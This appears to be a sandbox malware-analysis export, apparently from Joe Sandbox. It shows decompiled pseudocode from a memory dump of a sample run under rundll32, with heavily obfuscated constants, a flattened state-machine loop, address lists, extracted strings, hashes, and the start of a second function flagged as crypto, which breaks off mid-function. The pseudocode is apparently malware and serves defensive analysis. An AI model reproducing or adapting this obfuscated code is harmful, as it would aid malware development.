				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				void* _t481;
				signed int _t496;
				void* _t499;
				intOrPtr _t503;
				void* _t539;
				signed int _t550;
				signed int _t551;
				signed int _t552;
				intOrPtr _t553;
				intOrPtr* _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t567;
				signed int* _t568;
				void* _t572;

				_t568 =  &_v1764;
				_v1576 = 0x9a4c1d;
				_v1596 = _v1596 & 0x00000000;
				asm("stosd");
				_t499 = 0x9b91574;
				asm("stosd");
				asm("stosd");
				_v1684 = 0xe59dc4;
				_v1684 = _v1684 | 0xd0a48cbc;
				_v1684 = _v1684 + 0xffff2e59;
				_v1684 = _v1684 ^ 0xd0e4cc7c;
				_v1752 = 0x51b4b3;
				_v1752 = _v1752 ^ 0x5d9a17a0;
				_t550 = 0xb;
				_t555 = 0x76;
				_v1752 = _v1752 * 0xb;
				_v1752 = _v1752 ^ 0x54bb96eb;
				_v1752 = _v1752 ^ 0x53749705;
				_v1632 = 0xaf6c30;
				_v1632 = _v1632 << 6;
				_v1632 = _v1632 ^ 0x2bdb0c02;
				_v1720 = 0x499d0c;
				_v1720 = _v1720 | 0xb1a117f5;
				_v1720 = _v1720 / _t550;
				_v1720 = _v1720 + 0x97c7;
				_v1720 = _v1720 ^ 0x102d1aad;
				_v1704 = 0xc8e3b3;
				_v1704 = _v1704 * 0x32;
				_v1704 = _v1704 ^ 0x0819b8db;
				_v1704 = _v1704 | 0x44ca091a;
				_v1704 = _v1704 ^ 0x6fefc93f;
				_v1668 = 0xa62014;
				_v1668 = _v1668 | 0xeabb5dd4;
				_v1668 = _v1668 * 0x68;
				_v1668 = _v1668 ^ 0x5dcb1e30;
				_v1744 = 0xf6f234;
				_v1744 = _v1744 * 0x2a;
				_v1744 = _v1744 ^ 0x80b741fb;
				_v1744 = _v1744 / _t555;
				_v1744 = _v1744 ^ 0x0165dd5f;
				_v1584 = 0x312e96;
				_v1584 = _v1584 + 0xffff2d5f;
				_v1584 = _v1584 ^ 0x003c0d9d;
				_v1712 = 0xa058cf;
				_v1712 = _v1712 << 0xd;
				_v1712 = _v1712 >> 8;
				_t556 = 0x70;
				_v1712 = _v1712 / _t556;
				_v1712 = _v1712 ^ 0x000e60b1;
				_v1624 = 0xe892f9;
				_v1624 = _v1624 | 0x8c579b60;
				_v1624 = _v1624 ^ 0x8cfff2b4;
				_v1616 = 0xaf548d;
				_v1616 = _v1616 << 0xe;
				_v1616 = _v1616 ^ 0xd52eab36;
				_v1732 = 0xb05ea2;
				_v1732 = _v1732 * 0x22;
				_t557 = 0x7e;
				_v1732 = _v1732 / _t557;
				_t558 = 0x6e;
				_v1732 = _v1732 / _t558;
				_v1732 = _v1732 ^ 0x000d3439;
				_v1592 = 0x913a71;
				_v1592 = _v1592 + 0xffff7440;
				_v1592 = _v1592 ^ 0x0095b07c;
				_v1696 = 0x599322;
				_v1696 = _v1696 / _t550;
				_v1696 = _v1696 ^ 0xb13d8f34;
				_v1696 = _v1696 ^ 0xb1384542;
				_v1644 = 0xa16dfa;
				_v1644 = _v1644 ^ 0xe1099bcb;
				_v1644 = _v1644 ^ 0xe1a9d34e;
				_v1648 = 0xb4e11f;
				_v1648 = _v1648 ^ 0x38d2ca48;
				_v1648 = _v1648 ^ 0x386e0f93;
				_v1608 = 0x5a22b;
				_t559 = 0x77;
				_t551 = 0x6a;
				_v1608 = _v1608 * 0x7a;
				_v1608 = _v1608 ^ 0x02a61538;
				_v1680 = 0xefbd86;
				_v1680 = _v1680 ^ 0x59656a46;
				_v1680 = _v1680 + 0xffff500f;
				_v1680 = _v1680 ^ 0x598ded80;
				_v1724 = 0x3ee43e;
				_v1724 = _v1724 + 0x7543;
				_v1724 = _v1724 ^ 0x2e29824a;
				_v1724 = _v1724 + 0xffff57f4;
				_v1724 = _v1724 ^ 0x2e1fc8aa;
				_v1580 = 0xa6d208;
				_v1580 = _v1580 | 0x568c9bfe;
				_v1580 = _v1580 ^ 0x56ae214d;
				_v1636 = 0x6d5924;
				_v1636 = _v1636 ^ 0x925c239d;
				_v1636 = _v1636 ^ 0x923215a4;
				_v1664 = 0x695adc;
				_v1664 = _v1664 / _t559;
				_v1664 = _v1664 + 0x9e91;
				_v1664 = _v1664 ^ 0x000b7b12;
				_v1728 = 0x27fcd;
				_v1728 = _v1728 << 7;
				_v1728 = _v1728 >> 0xd;
				_v1728 = _v1728 / _t551;
				_v1728 = _v1728 ^ 0x000e8750;
				_v1660 = 0x324e38;
				_t560 = 0xd;
				_v1660 = _v1660 / _t560;
				_v1660 = _v1660 ^ 0xc6795c1b;
				_v1660 = _v1660 ^ 0xc67cbc2f;
				_v1672 = 0xd5264d;
				_v1672 = _v1672 ^ 0x5df7965f;
				_v1672 = _v1672 << 0xa;
				_v1672 = _v1672 ^ 0x8ac02156;
				_v1760 = 0x48e2ee;
				_t213 =  &_v1760; // 0x48e2ee
				_t561 = 0x2d;
				_v1760 =  *_t213 / _t561;
				_v1760 = _v1760 ^ 0xd2c1db30;
				_v1760 = _v1760 ^ 0xa53e2936;
				_v1760 = _v1760 ^ 0x77fe21cd;
				_v1740 = 0xf20c88;
				_v1740 = _v1740 / _t551;
				_v1740 = _v1740 | 0xd96c60ad;
				_v1740 = _v1740 << 0xc;
				_v1740 = _v1740 ^ 0xe68a7191;
				_v1588 = 0x8e0aab;
				_t562 = 0x1b;
				_v1588 = _v1588 * 0x60;
				_v1588 = _v1588 ^ 0x354c6054;
				_v1748 = 0x4e8d34;
				_v1748 = _v1748 + 0x9e68;
				_v1748 = _v1748 ^ 0xb589d4ed;
				_v1748 = _v1748 ^ 0xb12a6144;
				_v1748 = _v1748 ^ 0x04e7453a;
				_v1756 = 0x3003da;
				_v1756 = _v1756 << 2;
				_v1756 = _v1756 + 0x3550;
				_v1756 = _v1756 + 0xffff4840;
				_v1756 = _v1756 ^ 0x00bf12fa;
				_v1764 = 0x8da8e8;
				_v1764 = _v1764 * 0x70;
				_v1764 = _v1764 | 0x3d3a45ac;
				_v1764 = _v1764 + 0xffff8f06;
				_v1764 = _v1764 ^ 0x3dfaa955;
				_v1600 = 0x16815c;
				_v1600 = _v1600 | 0x74adb72e;
				_v1600 = _v1600 ^ 0x74bac2ad;
				_v1736 = 0x173f97;
				_v1736 = _v1736 + 0x884f;
				_v1736 = _v1736 ^ 0x83e17d26;
				_v1736 = _v1736 ^ 0x7950511a;
				_v1736 = _v1736 ^ 0xfaacae3a;
				_v1640 = 0x9a0364;
				_v1640 = _v1640 >> 4;
				_v1640 = _v1640 ^ 0x000747da;
				_v1700 = 0xbe1482;
				_v1700 = _v1700 ^ 0x7ff54444;
				_v1700 = _v1700 << 4;
				_v1700 = _v1700 + 0xffff3bda;
				_v1700 = _v1700 ^ 0xf4b38ed0;
				_v1708 = 0xf0c015;
				_v1708 = _v1708 >> 2;
				_v1708 = _v1708 * 0x59;
				_v1708 = _v1708 >> 0xd;
				_v1708 = _v1708 ^ 0x00007652;
				_v1628 = 0xfcf2a2;
				_v1628 = _v1628 + 0x310b;
				_v1628 = _v1628 ^ 0x00fb84b7;
				_v1716 = 0xcaf3e1;
				_v1716 = _v1716 ^ 0x58005d51;
				_v1716 = _v1716 / _t562;
				_v1716 = _v1716 << 0xb;
				_v1716 = _v1716 ^ 0x4f02f929;
				_v1688 = 0xa9bf16;
				_t563 = 0x35;
				_v1688 = _v1688 / _t563;
				_v1688 = _v1688 * 0x4f;
				_v1688 = _v1688 ^ 0x00ffa3e1;
				_v1692 = 0x1a52e4;
				_v1692 = _v1692 | 0xd338ade8;
				_v1692 = _v1692 + 0xffff9820;
				_v1692 = _v1692 ^ 0xd337a700;
				_v1652 = 0xe154f6;
				_v1652 = _v1652 ^ 0xa48feb80;
				_v1652 = _v1652 ^ 0xa466ad28;
				_v1676 = 0x84491a;
				_v1676 = _v1676 + 0x31b5;
				_v1676 = _v1676 + 0x8487;
				_v1676 = _v1676 ^ 0x0081059f;
				_v1604 = 0xb120c5;
				_t564 = 0x4b;
				_t552 = _v1596;
				_t567 = _v1596;
				_v1604 = _v1604 * 0x65;
				_v1604 = _v1604 ^ 0x45e4f2f6;
				_v1656 = 0x2a0a41;
				_v1656 = _v1656 << 0xc;
				_t498 = _v1596;
				_v1656 = _v1656 / _t564;
				_v1656 = _v1656 ^ 0x022e7e7e;
				_v1612 = 0x774513;
				_v1612 = _v1612 | 0x207416f8;
				_v1612 = _v1612 ^ 0x207b64ec;
				_v1620 = 0x205158;
				_v1620 = _v1620 << 0xd;
				_v1620 = _v1620 ^ 0x0a275bbe;
				while(1) {
					L1:
					while(1) {
						_t539 = 0x5c;
						do {
							while(1) {
								L3:
								_t572 = _t499 - 0xa8fcf9f;
								if(_t572 > 0) {
									break;
								}
								if(_t572 == 0) {
									E00358F9E(_v1688, _v1692, _v1652, _v1676, _t567);
									_t568 =  &(_t568[3]);
									goto L19;
								} else {
									if(_t499 == 0x4b40ba0) {
										_t553 =  *0x363e10; // 0x0
										_t554 = _t553 + 0x1c;
										while(1) {
											__eflags =  *_t554 - _t539;
											if( *_t554 == _t539) {
												break;
											}
											_t554 = _t554 + 2;
											__eflags = _t554;
										}
										_t552 = _t554 + 2;
										_t499 = 0x9c63280;
										continue;
									} else {
										if(_t499 == 0x7e93d80) {
											_t567 = E00341CEC(_v1740, _t552, _t499, _t499, _t552, _v1588, _t498, _v1748, _v1756, _v1764, _v1632, _v1704, _t499, _v1600, _v1668, _v1736, _t499, _v1720, _t499, _v1640,  &_v520);
											_t568 =  &(_t568[0x13]);
											__eflags = _t567;
											if(_t567 == 0) {
												L19:
												_t499 = 0xfa48365;
												_t539 = 0x5c;
												continue;
											} else {
												_t499 = 0xacc4ac0;
												_v1596 = 1;
												while(1) {
													_t539 = 0x5c;
													goto L3;
												}
											}
										} else {
											if(_t499 == 0x9b91574) {
												_push(_v1624);
												_push(_v1684);
												_push(_v1712);
												_push( &_v1560);
												E003546BB(_v1744, _v1584);
												_t568 = _t568 - 0xc + 0x1c;
												_t499 = 0xf66352a;
												while(1) {
													_t539 = 0x5c;
													goto L3;
												}
											} else {
												if(_t499 != 0x9c63280) {
													goto L27;
												} else {
													_t496 = E0034912C(_v1752, _v1728, _t499, _v1660, _t499, _v1672, _v1760);
													_t498 = _t496;
													_t568 =  &(_t568[5]);
													if(_t496 != 0) {
														_t499 = 0x7e93d80;
														while(1) {
															_t539 = 0x5c;
															goto L3;
														}
													}
												}
											}
										}
									}
								}
								L24:
								return _v1596;
							}
							__eflags = _t499 - 0xacc4ac0;
							if(_t499 == 0xacc4ac0) {
								E0034D6D8(_t567, _v1708, _t498, _v1628, _v1716);
								_t568 =  &(_t568[4]);
								_t499 = 0xa8fcf9f;
								_t539 = 0x5c;
								goto L27;
							} else {
								__eflags = _t499 - 0xf66352a;
								if(__eflags == 0) {
									_push(_v1592);
									_push(_v1732);
									_t481 = E0035DCF7(_v1616, 0x341020, __eflags);
									E0035176B( &_v1040, __eflags);
									_t503 =  *0x363e10; // 0x0
									_t431 = _t503 + 0x1c; // 0x1c
									_t432 = _t503 + 0x23c; // 0x23c
									E00351652(_v1644, __eflags, _t432, _t431, _v1648, _v1608, _t481, 0x104,  &_v520, _v1680,  &_v1560, _v1724,  &_v1040, _v1580);
									E0034A8B0(_v1636, _t481, _v1664);
									_t568 =  &(_t568[0xf]);
									_t499 = 0x4b40ba0;
									goto L1;
								} else {
									__eflags = _t499 - 0xfa48365;
									if(_t499 != 0xfa48365) {
										goto L27;
									} else {
										E00358F9E(_v1604, _v1656, _v1612, _v1620, _t498);
									}
								}
							}
							goto L24;
							L27:
							__eflags = _t499 - 0xd334e0e;
						} while (_t499 != 0xd334e0e);
						goto L24;
					}
				}
			}

0x00355cc4
0x00355cca
0x00355ce2
0x00355cea
0x00355cef
0x00355cf4
0x00355cf5
0x00355cf6
0x00355cfe
0x00355d06
0x00355d0e
0x00355d16
0x00355d1e
0x00355d2b
0x00355d2e
0x00355d31
0x00355d35
0x00355d3d
0x00355d45
0x00355d50
0x00355d58
0x00355d63
0x00355d6b
0x00355d7b
0x00355d7f
0x00355d87
0x00355d8f
0x00355d9c
0x00355da0
0x00355da8
0x00355db0
0x00355db8
0x00355dc0
0x00355dcd
0x00355dd1
0x00355dd9
0x00355de6
0x00355dea
0x00355dfa
0x00355dfe
0x00355e06
0x00355e11
0x00355e1c
0x00355e27
0x00355e2f
0x00355e34
0x00355e3d
0x00355e40
0x00355e44
0x00355e4c
0x00355e57
0x00355e62
0x00355e6d
0x00355e78
0x00355e80
0x00355e8b
0x00355e9a
0x00355ea4
0x00355ea9
0x00355eb3
0x00355eb8
0x00355ebc
0x00355ec4
0x00355ecf
0x00355eda
0x00355ee5
0x00355ef5
0x00355efb
0x00355f03
0x00355f0b
0x00355f16
0x00355f21
0x00355f2c
0x00355f37
0x00355f42
0x00355f4d
0x00355f60
0x00355f63
0x00355f66
0x00355f6d
0x00355f78
0x00355f80
0x00355f88
0x00355f90
0x00355f98
0x00355fa0
0x00355fa8
0x00355fb0
0x00355fb8
0x00355fc0
0x00355fcb
0x00355fd6
0x00355fe1
0x00355fec
0x00355ff7
0x00356002
0x00356012
0x00356016
0x0035601e
0x00356026
0x0035602e
0x00356033
0x00356040
0x00356044
0x0035604c
0x00356058
0x0035605b
0x0035605f
0x00356067
0x0035606f
0x00356077
0x0035607f
0x00356084
0x0035608e
0x00356096
0x0035609c
0x003560a1
0x003560a5
0x003560ad
0x003560b5
0x003560bd
0x003560cd
0x003560d3
0x003560db
0x003560e0
0x003560e8
0x003560fb
0x003560fe
0x00356105
0x00356110
0x00356118
0x00356120
0x00356128
0x00356130
0x00356138
0x00356140
0x00356145
0x0035614d
0x00356155
0x0035615d
0x0035616a
0x0035616e
0x00356176
0x0035617e
0x00356186
0x00356191
0x0035619c
0x003561a7
0x003561af
0x003561b7
0x003561bf
0x003561c7
0x003561cf
0x003561da
0x003561e2
0x003561ed
0x003561f5
0x003561fd
0x00356202
0x0035620a
0x00356212
0x0035621a
0x00356224
0x00356228
0x0035622d
0x00356235
0x00356240
0x0035624b
0x00356256
0x0035625e
0x0035626e
0x00356272
0x00356277
0x0035627f
0x0035628b
0x0035628e
0x00356297
0x0035629b
0x003562a3
0x003562ab
0x003562b5
0x003562bd
0x003562c5
0x003562d0
0x003562db
0x003562e6
0x003562ee
0x003562f6
0x003562fe
0x00356306
0x0035631b
0x0035631c
0x00356323
0x0035632a
0x00356331
0x0035633c
0x00356344
0x0035634f
0x00356356
0x0035635a
0x00356362
0x0035636d
0x00356378
0x00356383
0x0035638e
0x00356396
0x003563a1
0x003563a1
0x003563a6
0x003563a8
0x003563a9
0x003563a9
0x003563a9
0x003563a9
0x003563ab
0x00000000
0x00000000
0x003563b1
0x003564ef
0x003564f4
0x00000000
0x003563b7
0x003563bd
0x003564bb
0x003564c1
0x003564c9
0x003564c9
0x003564cc
0x00000000
0x00000000
0x003564c6
0x003564c6
0x003564c6
0x003564ce
0x003564d1
0x00000000
0x003563c3
0x003563c9
0x0035649d
0x0035649f
0x003564a2
0x003564a4
0x003564f7
0x003564f7
0x003563a8
0x00000000
0x003564a6
0x003564a6
0x003564ab
0x003563a6
0x003563a8
0x00000000
0x003563a8
0x003563a6
0x003563cb
0x003563d1
0x00356411
0x0035641f
0x00356423
0x00356435
0x00356436
0x0035643b
0x0035643e
0x003563a6
0x003563a8
0x00000000
0x003563a8
0x003563d3
0x003563d9
0x00000000
0x003563df
0x003563f8
0x003563fd
0x003563ff
0x00356404
0x0035640a
0x003563a6
0x003563a8
0x00000000
0x003563a8
0x003563a6
0x00356404
0x003563d9
0x003563d1
0x003563c9
0x003563bd
0x00356546
0x00356557
0x00356557
0x00356501
0x00356507
0x00356619
0x0035661e
0x00356621
0x00356625
0x00000000
0x0035650d
0x0035650d
0x00356513
0x00356558
0x00356564
0x0035656f
0x0035657d
0x003565bd
0x003565ca
0x003565ce
0x003565dc
0x003565f1
0x003565f6
0x003565f9
0x00000000
0x00356515
0x00356515
0x0035651b
0x00000000
0x00356521
0x0035653e
0x00356543
0x0035651b
0x00356513
0x00000000
0x00356626
0x00356626
0x00356626
0x00000000
0x00356632
0x003563a6

Strings

H, xrefs: 00356096
P5, xrefs: 00356145
FjeY, xrefs: 00355F80
A*, xrefs: 0035633C
T`L5, xrefs: 00356105
d{ , xrefs: 00356378
Rv, xrefs: 0035622D
$Ym, xrefs: 00355FE1
Cu, xrefs: 00355FA0
94, xrefs: 00355EBC
Q], xrefs: 0035625E
>>, xrefs: 00355F98
XQ , xrefs: 00356383

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: $Ym$94$>>$A*$Cu$FjeY$P5$Q]$Rv$T`L5$XQ $d{ $H
API String ID: 0-2231434368
Opcode ID: 2a1c1c2975db8755cb340ddcf52671708e2614fc53c1f2ddf4d36631e9fffadc
Instruction ID: f351307a85792998dd3605446cf1adaa77acca77b28e5a8525203d22f4393b7a
Opcode Fuzzy Hash: 2a1c1c2975db8755cb340ddcf52671708e2614fc53c1f2ddf4d36631e9fffadc
Instruction Fuzzy Hash: 7C223271508380DFD369CF25C98AA9BFBE2FBC4744F50891DE69A86260D7B58849CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00356DF8 Relevance: 15.5, Strings: 12, Instructions: 510
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00356DF8(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				short _v1568;
				short _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1592;
				char _v1596;
				char _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				signed int _v1804;
				signed int _v1808;
				signed int _v1812;
				signed int _v1816;
				signed int _v1820;
				signed int _v1824;
				signed int _v1828;
				signed int _v1832;
				signed int _v1836;
				signed int _v1840;
				signed int _v1844;
				void* _t583;
				void* _t585;
				void* _t592;
				void* _t603;
				void* _t606;
				void* _t609;
				signed int _t611;
				signed int _t612;
				signed int _t613;
				signed int _t614;
				signed int _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t619;
				void* _t620;
				signed int _t674;
				char _t675;
				void* _t677;
				signed int* _t682;

				_t682 =  &_v1844;
				_v1580 = 0x812dcc;
				_v1600 = 0;
				_v1572 = 0;
				_v1568 = 0;
				_v1576 = 0x4b1be1;
				_v1604 = 0xb0e9fc;
				_v1604 = _v1604 >> 0xe;
				_v1604 = _v1604 ^ 0x020002c3;
				_v1816 = 0x316963;
				_v1816 = _v1816 ^ 0x05c37e76;
				_v1816 = _v1816 * 0x44;
				_t609 = __ecx;
				_v1816 = _v1816 << 6;
				_t677 = 0xb42e112;
				_v1816 = _v1816 ^ 0x13878f70;
				_v1648 = 0xe65aa1;
				_v1648 = _v1648 + 0xffffb7c7;
				_v1648 = _v1648 ^ 0x00e866e0;
				_v1608 = 0x4e6d43;
				_v1608 = _v1608 << 3;
				_v1608 = _v1608 ^ 0x027e4d7c;
				_v1792 = 0x62c447;
				_v1792 = _v1792 + 0xfffff9b0;
				_v1792 = _v1792 + 0xffff1ab6;
				_v1792 = _v1792 ^ 0x5826ec20;
				_v1792 = _v1792 ^ 0x58465e47;
				_v1616 = 0xd881ce;
				_t611 = 0x1c;
				_v1616 = _v1616 / _t611;
				_v1616 = _v1616 ^ 0x00049a8c;
				_v1784 = 0x225701;
				_v1784 = _v1784 ^ 0x455f73cc;
				_v1784 = _v1784 + 0x2d0b;
				_v1784 = _v1784 + 0xffff7069;
				_v1784 = _v1784 ^ 0x457ed570;
				_v1656 = 0xa0746c;
				_v1656 = _v1656 << 5;
				_v1656 = _v1656 ^ 0x1405cb88;
				_v1756 = 0x86f3a;
				_v1756 = _v1756 << 0xf;
				_v1756 = _v1756 + 0xffff9aa0;
				_v1756 = _v1756 ^ 0x379e88f8;
				_v1840 = 0x372205;
				_v1840 = _v1840 << 0xb;
				_v1840 = _v1840 >> 1;
				_t612 = 0x47;
				_v1840 = _v1840 * 0x27;
				_v1840 = _v1840 ^ 0x18b0e4c5;
				_v1720 = 0x55473e;
				_v1720 = _v1720 >> 0xe;
				_v1720 = _v1720 + 0xffff4222;
				_v1720 = _v1720 ^ 0xfff7d1f7;
				_v1760 = 0x8a22d4;
				_v1760 = _v1760 ^ 0x5338d916;
				_v1760 = _v1760 / _t612;
				_v1760 = _v1760 ^ 0x01221ec9;
				_v1716 = 0x7ad7ec;
				_v1716 = _v1716 ^ 0xb2734e10;
				_v1716 = _v1716 ^ 0xf628ba0e;
				_v1716 = _v1716 ^ 0x44287105;
				_v1624 = 0x6426f4;
				_v1624 = _v1624 * 0x29;
				_v1624 = _v1624 ^ 0x100ef306;
				_v1728 = 0x3e505e;
				_v1728 = _v1728 >> 8;
				_t613 = 0x3a;
				_v1728 = _v1728 / _t613;
				_v1728 = _v1728 ^ 0x00050efb;
				_v1752 = 0x3958e2;
				_v1752 = _v1752 ^ 0x62ae6d50;
				_v1752 = _v1752 ^ 0x97f7befb;
				_v1752 = _v1752 ^ 0xf561088c;
				_v1688 = 0xb21a91;
				_v1688 = _v1688 ^ 0x7ffc0397;
				_v1688 = _v1688 ^ 0x7f439e8f;
				_v1620 = 0xd8d2d1;
				_v1620 = _v1620 + 0x194e;
				_v1620 = _v1620 ^ 0x00d523c5;
				_v1696 = 0xa820cb;
				_v1696 = _v1696 + 0x8b3c;
				_v1696 = _v1696 ^ 0x00a28581;
				_v1680 = 0x121bc4;
				_t674 = 0x7a;
				_v1680 = _v1680 / _t674;
				_v1680 = _v1680 ^ 0x0006e996;
				_v1744 = 0x9924c6;
				_v1744 = _v1744 << 4;
				_t614 = 0x11;
				_v1744 = _v1744 * 0x36;
				_v1744 = _v1744 ^ 0x04d385a1;
				_v1632 = 0x653a8;
				_v1632 = _v1632 * 0x63;
				_v1632 = _v1632 ^ 0x027c9a7f;
				_v1672 = 0x158278;
				_v1672 = _v1672 + 0xffff088d;
				_v1672 = _v1672 ^ 0x001491ab;
				_v1832 = 0x486b88;
				_v1832 = _v1832 + 0xffff9f3d;
				_v1832 = _v1832 >> 3;
				_v1832 = _v1832 | 0x023d4c2b;
				_v1832 = _v1832 ^ 0x0230cd37;
				_v1612 = 0xd2c4ef;
				_v1612 = _v1612 * 0x5a;
				_v1612 = _v1612 ^ 0x4a177333;
				_v1776 = 0x829598;
				_v1776 = _v1776 << 0xe;
				_v1776 = _v1776 >> 2;
				_v1776 = _v1776 | 0x8c8c5501;
				_v1776 = _v1776 ^ 0xaddb19b6;
				_v1712 = 0x169d18;
				_v1712 = _v1712 / _t614;
				_v1712 = _v1712 >> 0xa;
				_v1712 = _v1712 ^ 0x000c26db;
				_v1704 = 0xb2b50;
				_v1704 = _v1704 ^ 0x2de07b8f;
				_v1704 = _v1704 ^ 0x2de0ad86;
				_v1800 = 0x9652d5;
				_t615 = 3;
				_v1800 = _v1800 * 0x68;
				_v1800 = _v1800 / _t615;
				_v1800 = _v1800 << 0xa;
				_v1800 = _v1800 ^ 0x6cd74e85;
				_v1664 = 0x74acab;
				_v1664 = _v1664 | 0xe18c4dd2;
				_v1664 = _v1664 ^ 0xe1f0b032;
				_v1824 = 0x58e83b;
				_t616 = 0x2c;
				_v1824 = _v1824 * 0x2b;
				_v1824 = _v1824 + 0xffff56af;
				_v1824 = _v1824 ^ 0x0c61ca29;
				_v1824 = _v1824 ^ 0x02809c1e;
				_v1764 = 0x974237;
				_v1764 = _v1764 << 0xb;
				_v1764 = _v1764 * 0x31;
				_v1764 = _v1764 ^ 0x9d674e65;
				_v1736 = 0xc3f98b;
				_v1736 = _v1736 * 0x5e;
				_v1736 = _v1736 | 0x641bd8e3;
				_v1736 = _v1736 ^ 0x67f85735;
				_v1700 = 0xe4f15c;
				_v1700 = _v1700 | 0xddaa88b0;
				_v1700 = _v1700 ^ 0xdde3c6d3;
				_v1844 = 0x9b3502;
				_v1844 = _v1844 ^ 0x47d60286;
				_v1844 = _v1844 / _t616;
				_v1844 = _v1844 ^ 0x0193d551;
				_v1640 = 0xffe1b1;
				_t617 = 0x39;
				_v1640 = _v1640 * 0x7b;
				_v1640 = _v1640 ^ 0x7af2e2c5;
				_v1808 = 0x2876e6;
				_v1808 = _v1808 | 0x109585e0;
				_v1808 = _v1808 << 0xd;
				_v1808 = _v1808 + 0x9cd3;
				_v1808 = _v1808 ^ 0xbefbba98;
				_v1676 = 0xd3b2e1;
				_v1676 = _v1676 << 0xf;
				_v1676 = _v1676 ^ 0xd9748eec;
				_v1836 = 0x3e007f;
				_v1836 = _v1836 + 0xffffe462;
				_v1836 = _v1836 >> 9;
				_v1836 = _v1836 >> 6;
				_v1836 = _v1836 ^ 0x000afa23;
				_v1684 = 0x2c402;
				_v1684 = _v1684 >> 0xa;
				_v1684 = _v1684 ^ 0x0000130c;
				_v1692 = 0x94252b;
				_v1692 = _v1692 / _t617;
				_v1692 = _v1692 ^ 0x000dcb04;
				_v1828 = 0xd5c7f6;
				_v1828 = _v1828 * 0x41;
				_v1828 = _v1828 + 0x5616;
				_v1828 = _v1828 >> 9;
				_v1828 = _v1828 ^ 0x001e39c7;
				_v1740 = 0xceff06;
				_v1740 = _v1740 << 0xe;
				_v1740 = _v1740 << 8;
				_v1740 = _v1740 ^ 0xc18fb5bb;
				_v1748 = 0x414330;
				_v1748 = _v1748 * 0x1d;
				_v1748 = _v1748 | 0x5a6f0d55;
				_v1748 = _v1748 ^ 0x5f6ea92a;
				_v1668 = 0xd2b255;
				_v1668 = _v1668 ^ 0xc5d7949e;
				_v1668 = _v1668 ^ 0xc50ba027;
				_v1796 = 0xab825d;
				_v1796 = _v1796 << 0xc;
				_v1796 = _v1796 + 0xd01b;
				_t618 = 0x22;
				_v1796 = _v1796 / _t618;
				_v1796 = _v1796 ^ 0x056bf222;
				_v1724 = 0x6f3f31;
				_v1724 = _v1724 + 0x5a62;
				_v1724 = _v1724 / _t674;
				_v1724 = _v1724 ^ 0x0002d040;
				_v1652 = 0x230f16;
				_v1652 = _v1652 ^ 0x902061d9;
				_v1652 = _v1652 ^ 0x9007a9ef;
				_v1804 = 0xb250d0;
				_v1804 = _v1804 << 7;
				_v1804 = _v1804 << 0xe;
				_v1804 = _v1804 >> 0x10;
				_v1804 = _v1804 ^ 0x000e0b76;
				_v1644 = 0x39b2ec;
				_v1644 = _v1644 >> 5;
				_v1644 = _v1644 ^ 0x0004ae9a;
				_v1708 = 0x41b5f8;
				_v1708 = _v1708 << 9;
				_v1708 = _v1708 + 0xfffffd74;
				_v1708 = _v1708 ^ 0x836650ae;
				_v1768 = 0xd924a5;
				_t619 = 0x26;
				_v1768 = _v1768 * 0x57;
				_v1768 = _v1768 >> 4;
				_v1768 = _v1768 ^ 0x04932b37;
				_v1788 = 0x72a9d;
				_v1788 = _v1788 >> 0xb;
				_v1788 = _v1788 * 0x3f;
				_v1788 = _v1788 + 0xffffc8d5;
				_v1788 = _v1788 ^ 0x000eb520;
				_v1628 = 0x50edf9;
				_v1628 = _v1628 * 0x73;
				_v1628 = _v1628 ^ 0x245d5801;
				_v1772 = 0x77fe3c;
				_v1772 = _v1772 + 0x89a9;
				_v1772 = _v1772 | 0x772eb6e7;
				_v1772 = _v1772 + 0xffffc435;
				_v1772 = _v1772 ^ 0x777a10e8;
				_v1780 = 0x481950;
				_v1780 = _v1780 >> 0xb;
				_v1780 = _v1780 | 0x104efd63;
				_v1780 = _v1780 + 0xffffd02c;
				_v1780 = _v1780 ^ 0x1043876c;
				_v1636 = 0x899427;
				_v1636 = _v1636 << 0x10;
				_v1636 = _v1636 ^ 0x942ef0bd;
				_v1812 = 0xafb495;
				_v1812 = _v1812 | 0xf73eef3e;
				_v1812 = _v1812 + 0xffffb280;
				_v1812 = _v1812 ^ 0xf7b4985a;
				_v1732 = 0xe6dab0;
				_v1732 = _v1732 + 0x38b;
				_v1732 = _v1732 | 0x5f912f35;
				_v1732 = _v1732 ^ 0x5ff91c81;
